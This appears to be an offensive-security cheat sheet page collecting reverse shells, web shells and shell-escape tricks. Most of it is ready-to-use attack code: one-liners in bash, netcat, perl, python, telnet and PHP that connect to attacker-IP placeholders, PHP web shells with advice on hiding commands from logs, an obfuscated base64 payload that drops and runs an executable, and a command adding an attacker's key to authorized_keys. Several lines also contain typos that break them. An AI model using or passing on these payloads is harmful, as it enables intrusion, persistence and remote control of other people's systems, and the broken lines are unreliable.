Shells

Great reverse shell generator

1
https://offsecnewbie.com/reverse_shell.php
Copied!
I like using port 443 as its generally open on firewalls for HTTPS traffic. Sometimes servers and firewalls block non standard ports like 4444 or 1337
If connections drops or can not be established, try different ports 80,443,8080...

Interactive Shell Test

Copy below into shell. If YES, then you have an interactive shell
1
[[ $- == *i* ]] && echo "YES" || echo "No"
Copied!
terminal = tty = text input/output environment console = physical terminal shell = command line interpreter

Why the F is my shell not returning?!

A firewall is likely blocking the port returning. What ports are open on the server? Use one of those ports.

Escaping limited interpreters

Some payloads to overcome limited shells:

1
ssh [email protected]$ip nc $localip 4444 -e /bin/sh
2
enter user's password
3
​
4
export TERM=linux
5
python -c 'import pty; pty.spawn("/bin/sh")'
6
python3 -c 'import pty; pty.spawn("/bin/sh")'
7
python3 -c 'import pty; pty.spawn("/bin/bash")'
8
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
9
echo os.system('/bin/bash')
10
/bin/sh -i
11
exec "/bin/sh";
12
perl β€”e 'exec "/bin/sh";'
13
​
14
Related Shell Escape Sequences...
15
​
16
vi--> :!bash
17
vi--> :set shell=/bin/bash:shell
18
awk--> awk 'BEGIN {system("/bin/bash")}'
19
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
20
perl--> perl -e 'exec "/bin/bash";'
21
​
Copied!
go into /bin/ and see what binaries are in there.
1
/bin/csh -i # worked for BSD
Copied!

From within tcpdump

1
echo $’id\n/bin/netcat $ip 443 -e /bin/bash’ > /tmp/.test
2
chmod +x /tmp/.test
3
sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.tst -Z root
Copied!

From busybox

1
/bin/busybox telnetd -|/bin/sh -p9999
Copied!
1
#If you need a more stable connection:
2
nohup bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
Copied!
1
:!bash
2
:set shell=/bin/bash:shell
3
!bash
4
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
5
awk 'BEGIN {system("/bin/bash")}'
6
--interactive
7
echo "os.execute('/bin/sh')"
8
sudo nmap --script=exploit.nse
9
perl -e 'exec "/bin/bash";'
Copied!

Add public key to authorized keys:

1
echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys
Copied!

Python TTY shells

1
https://github.com/infodox/python-pty-shells
Copied!
1
on kali
2
edit tcp_pty_backconnect.py add kali ip and port and upload to target
3
python tcp_pty_shell_handler.py -b $kaliip:$port
4
​
5
on victim
6
chmod +x tcp_pty_backconnect.py
7
python tcp_pty_backconnect.py
Copied!
Ippsec using tool
1
https://youtu.be/NMGsnPSm8iw
Copied!

Upgrading to fully interactive

1
# On victim
2
python -c 'import pty;pty.spawn("/bin/bash")'
3
Ctrl-z
4
# On attacker
5
echo $TERM # note down
6
stty -a # note down rows and cols
7
stty raw -echo # this may be enough
8
fg
9
# On victim
10
reset
11
export SHELL=bash
12
export TERM=xterm256-color
13
stty rows 38 columns 116
Copied!
Note: Netcat (nc) OpenBSD does not support -e
1
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Copied!

Set PATH TERM and SHELL if missing:

1
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2
export TERM=xterm
3
export SHELL=bash
Copied!

PHP

Webshell

Web shells are hard to detect
This command will run system commands on the underlying system and return the complete output as a string
Try to get this code on the server - possibly by contaminating a log file
Could not load image
use nc to connect to server - the connect will be logged
if a reverse shell is not returning back to you try a diff shell maybe python. run 'which python' to see if python is available
1
# Execute one command
2
<?php system("whoami"); ?>
3
​
4
# Take input from the url paramter. shell.php?cmd=whoami
5
#remember you might have to add index.php to url then you can do index.php?cmd=whoami
6
<?php system($_GET['cmd']); ?>
7
​
8
# The same but using passthru
9
<?php passthru($_GET['cmd']); ?>
10
​
11
# For shell_exec to output the result you need to echo it
12
<?php echo shell_exec("whoami");?>
13
​
14
# Exec() does not output the result without echo, and only output the last line. So not very useful!
15
<?php echo exec("whoami");?>
16
​
17
# Instead to this if you can. It will return the output as an array, and then print it all.
18
<?php exec("ls -la",$array); print_r($array); ?>
19
​
20
# preg_replace(). This is a cool trick
21
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
22
​
23
# Using backticks
24
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
25
​
26
# Using backticks
27
<?php echo `whoami`; ?>
28
​
29
# download netcat and run it
30
<?php include (location of netcat),exec(reverse shell);?>
Copied!
Then you can execute the commands like this
1
http://victim/index.php?cmd=pwd
Copied!
Make the commands from above a bit more stealthy. Instead of passing the cmds through the url, which will be obvious in logs, pass them through other header-parameters. The use tamper data or burpsuite to insert the commands. Or just netcat or curl.
1
<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
2
<?php system($_SERVER['HTTP_USER_AGENT'])?>
Copied!
Could not load image
1
<?php system($_SERVER['HTTP_USER_AGENT'])?>
Copied!
add it to index page of a wordpress theme
1
http://$ip/webshell.php?cmd=id
Copied!
You can use this to move from web shell to a command line shell
1
http://$ip/webshell.php?cmd=nc $kali $port -e /bin/sh
Copied!

A Great WebShell

1
https://github.com/flozz/p0wny-shell/blob/master/shell.php
Copied!

Windows Shell

1
<?php
2
​
3
header('Content-type: text/plain');
4
$ip = "1.2.3.4"; //change this
5
$port = "1234"; //change this
6
$payload = "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";
7
$evalCode = gzinflate(base64_decode($payload));
8
$evalArguments = " ".$port." ".$ip;
9
$tmpdir ="C:\\windows\\temp";
10
chdir($tmpdir);
11
$res .= "Using dir : ".$tmpdir;
12
$filename = "D3fa1t_shell.exe";
13
$file = fopen($filename, 'wb');
14
fwrite($file, $evalCode);
15
fclose($file);
16
$path = $filename;
17
$cmd = $path.$evalArguments;
18
$res .= "\n\nExecuting : ".$cmd."\n";
19
echo $res;
20
$output = system($cmd);
21
22
?>
Copied!
maybe URL encode it
Commands to try in a webshell to find out a bit more about system through webshell to help you get a command line shell

Kali shells

1
/usr/share/webshells/
Copied!
Copy php-reverse-shell.php to working directory
1
cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.php
Copied!

Best PHP reverse shell:

1
<?php
2
echo 'running shell';
3
$ip='YOUR_IP';
4
$port='YOUR_PORT';
5
$reverse_shells = array(
6
'/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
7
'0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
8
'/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
9
'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
10
"/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
11
'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
12
'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
13
);
14
foreach ($reverse_shells as $reverse_shell) {
15
try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
16
try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
17
try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
18
}
19
system('id');
20
?>
Copied!

MIME Types

GIF89;
If a shell session closes quickly after it has been established, try to create a new shell session by executing one of the following commands on the initial shell. This will create a nested session!
1
bash
2
/bin/sh
3
/bin/sh -i
Copied!

Using netcat

1
nc <attacker_ip> <port> -e /bin/bash
Copied!

Using bash and TCP sockets

1
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
Copied!

Using sh and TCP sockets

1
0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196
Copied!

Using telnet

1
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
Copied!

PHP and sh

1
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Copied!

weevely

1
https://www.acunetix.com/blog/articles/web-shells-action-introduction-web-shells-part-4/
Copied!
1
--weevely.py command password output--
2
./weevely.py generate abcd123 shell.php
3
upload to victim then execute
4
./weevely.py http://$ip/shell.php abcd123
5
​
6
Then if you want reverse shell, run this on victim after running listener on kali
7
backdoor_reversetcp $kaliip $port
Copied!

Perl and sh

1
perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Copied!

Perl forking:

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Copied!

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Copied!

Reverse shell with python script:

1
#!/usr/bin/python
2
import socket,subprocess,os
3
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
4
s.connect(("IP",port))
5
os.dup2(s.fileno(),0)
6
os.dup2(s.fileno(),1)
7
os.dup2(s.fileno(),2)
8
p=subprocess.call(["/bin/sh","-i"])
Copied!

Go reverse shell

Communicates over DNS
1
https://github.com/sysdream/chashell
Copied!

Discover shell environment

Command
Output
php -v
PHP version
Python -V
Python version
Perl -v
Perl version
ls /usr/bin
Directory contents /usr/bin
uname -a
System information Linux
dir C:\”Program Files”
Directory contents Windows Program Files folder
systeminfo
System information Windows
id
Current user Linux
whoami
Current user Windows
pwd
Print working directory

Reading

1
https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/
Copied!
​
Last modified 5mo ago